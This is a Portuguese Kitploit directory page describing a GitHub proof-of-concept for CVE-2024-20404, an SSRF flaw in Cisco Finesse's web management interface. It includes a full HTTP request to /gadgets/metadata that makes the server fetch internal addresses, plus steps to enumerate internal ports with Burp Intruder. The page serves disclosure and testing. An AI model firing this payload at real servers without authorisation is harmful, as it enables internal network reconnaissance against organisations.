Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/3zz4t/cve-2024-20404
ReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHub3zz4t/cve-2024-20404

CVE-2024-20404

Exploit de prova de conceito para CVE-2024-20404 demonstrando SSRF na interface de gerenciamento baseada na web do Cisco Finesse, permitindo enumeração de portas internas e divulgação limitada de informações.

Ver Repositório
21há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
CVE-2024-20404 — Exploit de prova de conceito para CVE-2024-20404 demonstrando SSRF na interface de gerenciamento baseada na web do Cisco Finesse, permitindo enumeração de portas internas e divulgação limitada de informações. | Kitploit

Descrição

Uma vulnerabilidade na interface de gerenciamento baseada na web do Cisco Finesse pode permitir que um atacante remoto não autenticado realize um ataque SSRF em um sistema afetado.

Esta vulnerabilidade é devida à validação insuficiente da entrada fornecida pelo usuário para solicitações HTTP específicas que são enviadas a um sistema afetado. Um atacante poderia explorar esta vulnerabilidade enviando uma solicitação HTTP maliciosa para o dispositivo afetado. Uma exploração bem-sucedida poderia permitir que o atacante obtivesse informações confidenciais limitadas de serviços associados ao dispositivo afetado.

Prova de Conceito (PoC)

  1. Envie a solicitação abaixo para verificar a resposta da porta "8444" no localhost do servidor, após substituir o <target> pelo seu.
root@kitploit:~
POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

  1. Use o intruder do Burp Suite para escanear todas as portas abertas no servidor de gerenciamento baseado na web do Cisco Finesse, alterando o número da porta de 1 a 65535.

  2. Você verá a resposta "Connection refused" nas portas fechadas.

  1. As outras mensagens de erro indicam que essas portas estão abertas e podem ser enumeradas.

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2024-20404
  • https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew

Aviso Legal

Isso é apenas uma Prova de Conceito (PoC) para demonstrar que a interface de gerenciamento baseada na web do Cisco Finesse é vulnerável a Server Side Request Forgery (SSRF), e esta PoC é apenas para fins educacionais. Use-a de forma responsável e apenas em sistemas com permissão explícita para teste. O uso indevido desta PoC pode resultar em consequências graves.

Baixar ferramenta